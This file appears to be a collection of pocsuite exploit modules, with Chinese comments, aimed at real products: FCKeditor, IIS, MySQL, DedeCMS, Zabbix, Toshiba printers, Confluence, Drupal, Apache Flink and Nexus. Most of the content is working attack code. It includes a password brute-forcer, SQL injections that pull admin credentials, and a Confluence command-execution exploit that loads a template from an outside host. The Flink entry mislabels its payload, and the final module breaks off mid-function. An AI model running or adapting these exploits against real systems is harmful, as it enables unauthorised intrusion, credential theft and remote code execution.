#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class FckeditorPOC(POCBase):
    vulID = '6'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2017-03-13' #漏洞公开的时间,不知道就写今天

    author = 'ly55521' #  PoC作者的大名
    createDate = '2017-03-13'# 编写 PoC 的日期
    updateDate = '2017-03-13'# PoC 更新的时间,默认和编写时间一样
    references = 'http://0535code.com/'# 漏洞地址来源,0day不用写
    name = 'Fckeditor info'# PoC 名称
    appPowerLink = 'http://ckeditor.com/'# 漏洞厂商主页地址
    appName = 'Fckeditor'# 漏洞应用名称
    appVersion = 'unknown'# 漏洞影响版本
    vulType = 'file-upload'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Fckeditor上传解析漏洞 
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危" #严重,高危,中危,低危
    #定义字典常量
    fckdir = [
        "FCKeditor2.3/",
        "server/fckeditor/editor/fckdebug.html",
        "mambots/editors/fckeditor",
        "FCKeditor2/",
        "admin/fckeditor/editor/filemanager/upload/php/upload.php",
        "FCKeditor/editor/dialog/",
        "admin/fckeditor/editor/filemanager/upload/asp/upload.asp",
        "includes/fckeditor/editor/filemanager/upload/asp/upload.asp",
        "includes/fckeditor/editor/filemanager/upload/php/upload.php",
        "FCKeditor21/",
        "includes/fckeditor/editor/filemanager/connectors/aspx/connector.aspx",
        "manage/fckeditor",
        "FCKeditor2.2/",
        "fckeditor/editor/filemanager/browser/default/connectors/php/connector.php",
        "manage/fckeditor",
        "admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx",
        "admin/fckeditor/editor/filemanager/connectors/asp/connector.asp",
        "html/editor/fckeditor/editor/filemanager",
        "fckeditor/editor/filemanager/connectors/asp/connector.asp",
        "fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp",
        "includes/fckeditor/editor/filemanager/connectors/asp/upload.asp",
        "assets/fckeditor",
        "fckeditor/editor/filemanager/upload/aspx/upload.aspx",
        "web/FCKeditor/editor/filemanage",
        "inc/fckeditor/",
        "fckeditor/editor/filemanager/connectors/asp/upload.asp",
        "admin/FCKeditor/editor/filemanage",
        "browser/trunk/fckeditor/editor/filemanager/",
        "FCKeditor22/",
        "scripts/fckeditor/editor/filemanager/",
        "admin/fckeditor/editor/filemanager/connectors/asp/upload.asp",
        "inc/fckeditor",
        "includes/fckeditor/editor/filemanager/connectors/php/connector.php",
        "system/Fckeditor",
        "admin/FCKeditor",
        "editors/FCKeditor",
        "fckeditor",
        "javascript/editors/fckeditor",
        "include/fckeditor",
        "FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php",
        "boke/Edit_Plus/FCKeditor/editor/",
        "js/editor/fckeditor/editor/filemanager",
        "FCKeditor23/",
        "plugins/fckeditor",
        "includes/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx",
        "resources/fckeditor",
        "tools/fckeditor/editor/filemanager",
        "FCKeditor20/",
        "includes/fckeditor/editor/filemanager",
        "html/js/editor/fckeditor/editor/filemanager",
        "fckeditor/editor/filemanager/connectors/aspx/upload.aspx",
        "FCKeditor2.4/",
        "admin/fckeditor",
        "machblog/browser/trunk/fckeditor/editor/filemanager/",
        "fckeditor/editor/filemanager/connectors/aspx/connector.aspx",
        "FCKeditor",
        "admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx",
        "admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp",
        "results/fckeditor/editor/filemanage",
        "editor/FCKeditor/editor/filemanager",
        "fckEditor/editor/",
        "editor/FCKeditor",
        "ocomon/includes/fckeditor/editor/filemanager",
        "sites/all/modules/fckeditor",
        "FCKeditor24/",
        "fckeditor/editor/filemanager/upload/asp/upload.asp",
        "demo/fckeditor/editor/filemanager",
        "web_Fckeditor",
        "sites/all/libraries/fckeditor",
        "includes/fckeditor/editor/filemanager/connectors/php/upload.php",
        "FCKeditor/editor/filemanage",
        "apps/trac/pragyan/browser/trunk/cms/modules/article/fckEditor/editor/filemanage",
        "gs/plugins/editors/fckeditor",
        "include/fckeditor/",
        "adm/fckeditor",
        "thirdparty/fckeditor",
        "includes/fckeditor/editor/filemanager/connectors/aspx/upload.aspx",
        "admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx",
        "common/FckEditor/editor/filemanager",
        "includes/fckeditor/editor/filemanager/connectors/asp/connector.asp",
        "fckeditor/editor/filemanager/connectors/php/connector.php",
        "lib/fckeditor",
        "blog/fckeditor",
        "CFIDE/scripts/ajax/FCKeditor",
        "ispcp/browser/trunk/gui/tools/filemanager/plugins/fckeditor/editor/filemanager",
        "demo/admin/fckeditor/editor/filemanager",
        "admin/fckeditor/editor/filemanager/connectors/php/upload.php",
        "fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx",
        "includes/fckeditor/editor/filemanager/upload/aspx/upload.aspx",
        "assets/js/fckeditor",
        "fckeditor/editor/filemanager/upload/php/upload.php",
        "FCKeditor2.1/",
        "js/FCKeditor",
        "admin/scripts/fckeditor",
        "admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php",
        "FCKeditor/",
        "fckeditor/editor/filemanager/connectors/php/upload.php",
        "INC/FckEditor/editor/filemanager",
        "fck",
        "includes/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php",
        "lib/fckeditor/",
        "common/INC/FckEditor/editor/filemanager",
        "plugins/editors/fckeditor",
        "includes/fckeditor",
        "admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx",
        "includes/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp",
        "admin/fckeditor/editor/filemanager/connectors/php/connector.php",
        "FCKeditor2.0/",
        "ThirdPartyControl/fckeditor/editor/filemanage",
    ]

    #验证漏洞 pocsuite -r 6-Fckeditor-info.py -u 127.0.0.1 --verify
    def _verify(self):
        #定义返回结果
        result = {}
        #获取漏洞url
        vul_url = '%s' % self.url
        from urlparse import urlparse, urlunparse, urljoin
        urlinfo = urlparse(vul_url)
        check_url = urlunparse((urlinfo.scheme, urlinfo.netloc, '/', '', '', ''))
        #print check_url
        
        payload_dict = {}
        final_url = []
        for fckurl in self.fckdir:
            targetURL = urljoin(check_url, fckurl) 
            #print targetURL
            try:
                r = req.get(url=targetURL, timeout=1,allow_redirects=False) #禁止重定向
                # print targetURL,r.status_code
                if r.status_code in [200,300,202]:

                    #print u"存在漏洞",targetURL
                    # payload_url.append(targetURL)
                    payload_dict[targetURL] = r.text
            except Exception  as e:
                pass
                # print "error",e,targetURL
            #return result
        #print payload_url
        if len(payload_dict) > 0:
            for i in payload_dict:
                if payload_dict.values().count(payload_dict[i]) == 1:
                    final_url.append(i)
            if (len(final_url) != 0 and len(final_url) < 15 ) :
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url
                result['VerifyInfo']['Payload'] = str(final_url)
            #print result
        print('[+]6 poc done')
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(FckeditorPOC)




#!/usr/bin/env python
# coding: utf-8
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class TestPOC(POCBase):
    vulID = '0'
    version = '1.0'
    author = 'hancool'
    vulDate = '2019-1-9'
    createDate = '2019-1-9'
    updateDate = '2019-1-9'
    references = ['https://github.com/lijiejie/IIS_shortname_Scanner', ]
    name = 'IIS Tilde Vulnerability (IIS Shortname) Check'
    appPowerLink = 'https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability'
    appName = 'IIS'
    appVersion = '6.0'
    vulType = VUL_TYPE.INFORMATION_DISCLOSURE
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
    Microsoft IIS contains a flaw that may lead to an unauthorized information disclosure.
    The issue is triggered during the parsing of a request that contains a tilde character (~).
    This may allow a remote attacker to gain access to file and folder name information.
    '''

    def _verify(self):
        # reference from https://github.com/lijiejie/IIS_shortname_Scanner/blob/master/iis_shortname_Scan.py
        def check(url):
            url1 = url + '/*~1*/index99.aspx'         # an existed file/folder
            url2 = url + '/1ndex*~1*/index99.aspx'    # not existed file/folder
            # for _method in ['GET', 'OPTIONS']:
            try:
                # GET:
                r1 = req.get(url1)
                status_1 = r1.status_code
                r2 = req.get(url2)
                status_2 = r2.status_code
                if status_1 == 404 and status_2 != 404:
                    return True
                # OPTIONS:
                r1 = req.options(url1)
                status_1 = r1.status_code
                r2 = req.options(url2)
                status_2 = r2.status_code
                if status_1 == 404 and status_2 != 404:
                    return True
                return False
            except Exception as e:
                # raise
                return False

        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [80]
        for port in ports:
            try:
                url = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
                status = check(url)
                if status:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(
                        pr.hostname, port)
                    break
            except:
                pass

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

# requests
from pocsuite.api.request import req
import urllib
# register
from pocsuite.api.poc import register
# report
from pocsuite.api.poc import Output, POCBase
# url转换host
from pocsuite.lib.utils.funs import url2ip


# 基础基类
class MYSQLPOC(POCBase):
    vulID = '38'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  # 默认为1
    vulDate = '2018-06-8'  # 漏洞公开的时间,不知道就写今天
    author = 'xiaohuihui1'  # PoC作者的大名
    createDate = '2018-06-8'  # 编写 PoC 的日期
    updateDate = '2018-06-8'  # PoC 更新的时间,默认和编写时间一样
    references = 'http://www.freebuf.com/articles/rookie/162036.html'  # 漏洞地址来源,0day不用写
    name = 'mysql weak pass'  # PoC 名称
    appPowerLink = 'https://www.mysql.com/'  # 漏洞厂商主页地址
    appName = 'mysql weak pass poc'  # 漏洞应用名称
    appVersion = 'all versions'  # 漏洞影响版本
    vulType = 'weak pass'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        mysql 弱口令
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"  # 严重,高危,中危,低危

    # 指纹方法
    def _fingerprint(self):
        pass

    def _verify(self):
        # 调用指纹方法
        result={}
        import MySQLdb

        vul_ip = self.url[7:]
        user=["root","admin","test",]
        password=['123456','admin',"111111",'root','password','123123','123','1','','{user}',
          '{user}{user}','{user}1','{user}123','{user}2016','{user}2015',
          '{user}!','P@ssw0rd!!','qwa123','12345678','test','123qwe!@#',
          '123456789','123321','1314520','666666','woaini','fuckyou','000000',
          '1234567890','8888888','qwerty','1qaz2wsx','abc123','abc123456',
          '1q2w3e4r','123qwe','159357','p@ssw0rd','p@55w0rd','password!',
          'p@ssw0rd!','password1','r00t','system','111111','admin']

        #判断端口是否开放   
        import socket
        sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sk.settimeout(1)
        try:
            sk.connect((vul_ip,3306))
            #print 'Server port is OK!'
        except Exception:
           return self.save_output(result)
        sk.close()
        
        _conn_timeout = 1
        for u in user:
            for p in password:
                try:
                    pwd = p.replace('{user}', u)
                    conn = MySQLdb.connect(vul_ip, u, pwd, 'mysql',connect_timeout=_conn_timeout )
                    conn.close()
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vul_ip
                    result['VerifyInfo']['Payload'] = u+":"+pwd
                    return self.save_output(result)
                except Exception as e:
                    pass
        return self.save_output(result)
    # 攻击模块
    def _attack(self):
        return self._verify()
        #pass

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


# 注册类
register(MYSQLPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register
class TestPOC(POCBase):
    name = 'plus/recommend 注入漏洞利用EXP'
    vulID = '6' 
    author = ['bey0nd']
    vulType = 'SQL Injection'
    version = '1.0'    # default version: 1.0
    references = ['http://www.wooyun.org/']
    desc = '''
            开发人员在修补漏洞的时候只修复了少数的变量而遗漏了其他变量，使其他变量直接
            带入了SQL语句中，可以通过字符来转义掉一个单引号，逃逸单引号，产生SQL注入。
            此注入为报错注入，可以通过UpdateXML函数进行注入。
        '''

    vulDate = '2016-12-07'
    createDate = '2016-12-07'
    updateDate = '2016-12-07'

    appName = ''
    appVersion = '5.7'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        # print self.url
        target = self.url + "plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"
        # print target
        html = req.get(target).text
        start = html.find("<h2>")
        if(start!=-1):
            end = html.find("</h2>")
            
            result['DBInfo'] = {}
            result['DBInfo']['Username'] = html[start+7:end]
        return self.parse_output(result)


        

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Failed')
        return output


register(TestPOC)



#!/usr/bin/env python
#_*_ encoding: utf-8 _*_
from pocsuite3.api import register_poc
from pocsuite3.api import requests
from pocsuite3.api import Output
from pocsuite3.api import logger
from pocsuite3.api import POCBase

class Zabbix(POCBase):
    vulID = 'N/A'
    version = '1.0'
    author = 'big04dream'
    vulDate = ''
    createDate = '2019-11-06'
    updateDate = '2019-11-06'
    references = ['']
    name = 'Zabbix <= 4.4 Authentication Bypass'
    appPowerLink = ''
    appName = 'Zabbix'
    appVersion = 'Zabbix <= 4.4'
    vulType = 'Authentication Bypass'
    desc = ''' 
    Zabbix <= 4.4 Authentication Bypass
    '''

    @property
    def _get_url(self):
        if self.url[-1] == '/':
            url = self.url
        else:
            url = self.url + '/'
        return url

    @property
    def _headers(self):
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
            'Referer': self.url
        }
        return headers

    def _verify(self):
        result = {}
        payload = '\x2f\x7a\x61\x62\x62\x69\x78\x2f\x7a\x61\x62\x62\x69\x78\x2e\x70\x68\x70\x3f\x61\x63\x74\x69\x6f\x6e\x3d\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x2e\x76\x69\x65\x77\x26\x64\x61\x73\x68\x62\x6f\x61\x72\x64\x69\x64\x3d\x31'
        try:
            target = self._get_url + payload
            response = requests.get(
                url = target,
                headers = self._headers
            )
            if 'Dashboard' in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Not vulnerability')
        return output

register_poc(Zabbix)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from urlparse import urlparse, urljoin
from pocsuite.api.request import req

class TestPOC(POCBase):
    vulID = 'N/A'
    version = '1.0'
    author = 'co0ontty'
    vulDate = '2019-10-18'
    createDate = '2019-10-18'
    updateDate = '2019-10-18'
    references = ['']
    name = '东芝打印机越权访问漏洞'
    appPowerLink = 'https://www.toshiba.com.cn/service/'
    appName = 'TOSHIBA'
    appVersion = ''
    vulType = '越权访问'
    desc = '''
    '''
    samples = ['http://70.31.144.155:8080']
    install_requires = ['']


    def _verify(self):
        result = {}
        target = urljoin(self.url,"/TopAccess/default.htm")
        e_filing_url = urljoin(self.url,'/e-FilingBox/efb.asp?')
        resp = req.get(target)
        e_filing_resp = req.get(e_filing_url)
        verify_list = ['TopAccess','Device/Device.htm','Device/SubMenu.htm','e-Filing']
        e_filing_verify_list = ['View','Edit','File']
        if  resp.status_code == 200 and any(_ in resp.text for _ in verify_list) and e_filing_resp.status_code == 200 and any(_ in e_filing_resp.text for _ in e_filing_verify_list)  :
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['HOME_URL'] = target
            result['VerifyInfo']['CONTROL_URL'] = e_filing_url
        return self.parse_output(result)

    _attack = _verify

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
#coding=utf-8

import json
from lxml import etree
from pocsuite3.api import OptString
from pocsuite3.api import requests
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase

class confluence_exec_poc(POCBase):
    vulID = '97898'
    version = '1.0'
    author = 'xmy'
    vulDate = ''
    createDate = '2019-04-04'
    updateDate = '2019-04-04'
    references = ['https://www.seebug.org/vuldb/ssvid-97898']
    name = 'Confluence 远程命令执行漏洞(CVE-2019-3396)'
    appPowerLink = 'https://www.atlassian.com/'
    appName = 'Confluence'
    appVersion = '6.x'
    vulType = 'Code Execution'
    desc = '''
        Confluence Server 与 Confluence Data Center 中的 Widget Connector 存在服务端模板注入漏洞，攻击者构造特定请求可远程遍历服务器任意文件，
        甚至实现远程命令执行攻击。
        '''
    samples = []
    
    def _options(self):
        opt = {}
        opt['cmd'] = OptString('', description='shell command', require=False)
        
        return opt

    def _verify(self):
        result = {}
        headers = {}
        target = self.url + '/rest/tinymce/1/macro/preview'
        payload = {'contentId':'786458','macro':{'name':'widget','body':'','params':{'url':'https://www.viddler.com/v/23464dc6','width':'1000','height':'1000','_template':'file:///etc/passwd'}}}
        referer = self.url + '/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&'
        content_type = 'application/json; charset=utf-8'
        headers['Referer'] = referer
        headers['Content-Type'] = content_type  #需要设置Content-Type，否则会显示XSRF check failed
        
        response = requests.post(target, data=json.dumps(payload), headers=headers)
        content = response.content
        poc_output = etree.HTML(content).xpath('//div[@class="wiki-content"]/text()')[0].strip()
        keyword = 'root:x:0:0:root:/root'   #/etc/passwd关键字
        if keyword in poc_output:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target
            
        return self.parse_output(result)
     
    def _attack(self):
        result = {}
        headers = {}
        target = self.url + '/rest/tinymce/1/macro/preview'
        poc_file = 'https://raw.githubusercontent.com/qlxmy/vul/master/Confluence_CVE-2019-3396/poc.rm'
        cmd = self.get_option('cmd')
        payload = {"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":poc_file,"command":cmd}}}
        referer = self.url + '/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&'
        content_type = 'application/json; charset=utf-8'
        headers['Referer'] = referer
        headers['Content-Type'] = content_type  #需要设置Content-Type，否则会显示XSRF check failed
        
        response = requests.post(target, data=json.dumps(payload), headers=headers)
        content = response.content
        cmd_output = etree.HTML(content).xpath('//div[@class="wiki-content"]/text()')[0].strip()
        if cmd_output:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = target
            result['ShellInfo']['command'] = cmd
            print(cmd_output)
            
        return self.parse_output(result)
        
    
    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output
        
register_poc(confluence_exec_poc)




"""

If you have issues about development, please read:

https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md

for more about information, plz visit http://pocsuite.org

"""



import re

# import base64

from collections import OrderedDict



from pocsuite3.api import Output

from pocsuite3.api import POCBase

from pocsuite3.api import OptDict

# from pocsuite3.api import logger

from pocsuite3.api import requests

from pocsuite3.api import OptString

from pocsuite3.api import register_poc

from pocsuite3.api import POC_CATEGORY

# from pocsuite3.api import REVERSE_PAYLOAD

# from pocsuite3.api import get_listener_ip

# from pocsuite3.api import get_listener_port





class DemoPOC(POCBase):

	vulID = '87364'  # ssvid

	version = '1.0'

	author = ['Knownsec']

	vulDate = '2014-10-15'

	createDate = '2014-11-13'

	updateDate = '2014-11-13'

	references = ['https://www.seebug.org/vuldb/ssvid-87364']

	name = 'Drupal < 7.32 “Drupalgeddon” SQL注入漏洞'

	appPowerLink = 'https://www.drupal.org/'

	appName = 'Drupal'

	appVersion = '< 7.32'

	vulType = 'SQL-injection'

	desc = '''

		其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞，攻击者可以执行

		任意SQL语句，插入、修改管理员信息，甚至执行任意代码。

	'''

	samples = ['http://10.10.50.19:8118']

	install_requires = []

	category = POC_CATEGORY.EXPLOITS.WEBAPP



	def _options(self):

		o = OrderedDict()

		o["sql"] = OptString('0 or updatexml(0,concat(0xa,user()),0)%23', description='需要用户输入sql注入', require=True)

		

		return o



	def _verify(self):

		result = {}

		url = self.url.rstrip('/') + '/?q=node&destination=node'

		headers = get_headers()

		payload = 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[%s]=bob&name[0]=a' % self.get_option("sql")

		q = requests.post(url, headers=headers, data=payload)

		# print(q.text)

		line = r'PDOException([\s\S]*)user\.module'

		m = re.search(line, q.text, re.M|re.I)

		# print('-----------------')

		# print(m.group())

		# if p.status_code == 301:

		if m:

			result['VerifyInfo'] = {}

			result['VerifyInfo']['payload'] = payload

			result['VerifyInfo']['content'] = m.group()



		return self.parse_output(result)



	def _attack(self):

		return self._verify()



	def parse_output(self, result):

		output = Output(self)

		if result:

			output.success(result)

		else:

			output.fail('target is not vulnerable')

		return output



def get_headers():

	headers = {

		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0',

		'Accept': '*/*',

		'Accept-Language': 'en',

		'Accept-Encoding': 'gzip, deflate',

		'Content-Type': 'application/x-www-form-urlencoded'

	}

	

	return headers



register_poc(DemoPOC)


#!/usr/bin/env python
# coding: utf-8
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class TestPOC(POCBase):
    vulID = '0'
    version = '1.0'
    author = 'hancool'
    vulDate = '2019-1-8'
    createDate = '2019-1-8'
    updateDate = '2019-1-8'
    references = ['', ]
    name = 'The IIS Vul （CVE-2015-1635，MS15-034）Check'
    appPowerLink = 'https://docs.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-034'
    appName = 'IIS'
    appVersion = '7.0'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
    MS15-034 HTTP.sys DoS And Possible Remote Code Execution.
    HTTP.sys Remote Code Execute.
    '''

    def _verify(self):
        def check(url):
            Server_Tag = ['Microsoft-HTTP', 'Microsoft-IIS']
            try:
                Request_Tmp = req.get(url)
                remote_server = Request_Tmp.headers['server']
                if (tmp_tag in remote_server for tmp_tag in Server_Tag):
                    return test_ms15_034(url)
                else:
                    return (False, 'Web Service Is Not IIS\n[+] May Be ' + remote_server)
            except req.exceptions.ConnectTimeout:
                return (False, 'timeout')
            except Exception as e:
                # raise
                return (False, '{}'.format(str(e)))

        def test_ms15_034(url):
            Req_headers = {'Host': 'stuff',
                           'Range': 'bytes=0-18446744073709551615'}
            Request = req.get(url, headers=Req_headers)
            if b'Requested Range Not Satisfiable' in Request.content:
                return (True, Request.content)
            elif b'The request has an invalid header name' in Request.content:
                return (False, 'The vulnerability has been fixed!')
            else:
                return (False, 'The IIS service was unable to display the vulnerability exists, the need for manual testing!')

        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [80]
        for port in ports:
            try:
                url = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
                status, msg = check(url)
                if status:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(
                        pr.hostname, port)
                    break
            except:
                pass

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from urlparse import urljoin
from pocsuite.api.request import req


class TestPOC(POCBase):
    vulID = '98101'
    version = '1.0'
    author = 'co0ontty'
    vulDate = '2019-11-14'
    createDate = '2019-11-14'
    updateDate = '2019-11-14'
    references = ['https://www.seebug.org/vuldb/ssvid-98101']
    name = 'Apache Flink 任意 Jar 包上传导致远程代码执行漏洞'
    appPowerLink = 'https://flink.apache.org/'
    appName = 'Apache flink'
    appVersion = 'Apache Flink<=1.9.1'
    vulType = '代码执行'
    desc = '''
    攻击者可利用该漏洞在 Apache Flink Dashboard 页面中上传任意 Jar 包获取服务器最高权限。
    '''
    samples = ['http://54.77.247.43:8081']
    install_requires = ['']

    def _verify(self):
        result = {}
        target = self.url
        poc_path = urljoin(target,"product_detail.php?id=1+union+select+1,2,3,4,5,6--+--")
        print(poc_path)
        # headers = {
        #     "TE": "deflate,gzip;q=0.3",
        #     "Connection":" TE, close"
        # }
        # data = '''wanType%3d0%26adslUser%3d%26adslPwd%3d%26vpnServer%3d%26vpnUser%3d%26vpnPwd%3d%26vpnWanType%3d1%26dnsAuto%3d0%26staticIp%3d%26mask%3d%26gateway%3d%26dns1%3d8.8.8.8%26dns2%3d%3bping+%60whoami%60.ip.port.9xp4e7.ceye.io%3b%26module%3dwan1'''
        # if ".u.p.k." in req.get(poc,headers=headers).text:
        if req.get(poc_path).status_code == 200:
            result['VerifyInfo'] = {}
            result['VerifyInfo'] = self.url
            result['VerifyInfo']['text'] = req.get(poc_path).text
        
        return self.parse_output(result)

    _attack = _verify

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
#coding=utf-8

import random
import json
import base64
import traceback

# 为了拿到password-top100.txt
from pocsuite3.lib.core.data import paths

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE

'''
CVE-2018-16621: Nexus 3 EL injection
Admin access is required
'''
class Nexus3_2018_16621_EL_INJECTION_POC(POCBase):
    vulID = 'Nexus3-CVE-2018-16621'
    appName = 'Nexus3'
    appVersion = 'Nexus Repository Manager OSS/Pro <=3.13.0'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2018-10-18'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2020-04-03'  # 编写 PoC 的日期
    updateDate = '2020-04-07'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://support.sonatype.com/hc/en-us/articles/360010789153-CVE-2018-16621-Nexus-Repository-Manager-Java-Injection-October-17-2018']  # 漏洞地址来源,0day不用写
    name = 'Nexus3 EL injection'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"中危"

    
    # 使用随机字符串作为banner，计算数字之后返回
    ran1 = random.randint(1,100)

    ran2 = random.randint(100,200)
    
    ran_sum = ran1 * ran2

    h = {"NX-ANTI-CSRF-TOKEN": "test", "Cookie": "NX-ANTI-CSRF-TOKEN=test"}    # 用于通过Nexus的CSRF验证


    def _verify(self):
        result={}

        vul_url = self.url
        
        target_url = vul_url + "/service/extdirect"

        j = {
                "action":"coreui_User",
                "method":"create",
                "data": [
                    {
                        "userId": "shadowsock5",
                        "firstName": "77",
                        "lastName": "ss",
                        "password": "password",
                        "email": "77@qq.com",
                        "status": "active",
                        "roles": [
                            "$" + "{" + str(self.ran1) + "*" + str(self.ran2) + "}"
                        ]
                    }
                ],
            "type":"rpc","tid":4}
        
        resp = None    # 返回的响应
        
        
        l_auth_headers = self.get_auth_headers()
        print("user:password lenth:")
        print(len(l_auth_headers))

        for auth_header in l_auth_headers:
            # 将auth请求头更新到headers中
            self.headers.update(auth_header)
            # 更新CSRF token
            self.headers.update(self.h)
            
            try:
                # 发起payload请求
                resp = req.post(target_url, json=j, headers=self.headers) #, proxies={'http': 'http://127.0.0.1:8087'})

                if self.test_EL(resp):   # 验证响应中json的相应字段是否已经执行了EL表达式
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target_url
                    result['VerifyInfo']['Credentials'] = auth_header
                    return self.save_output(result)
                return self.save_output(result)
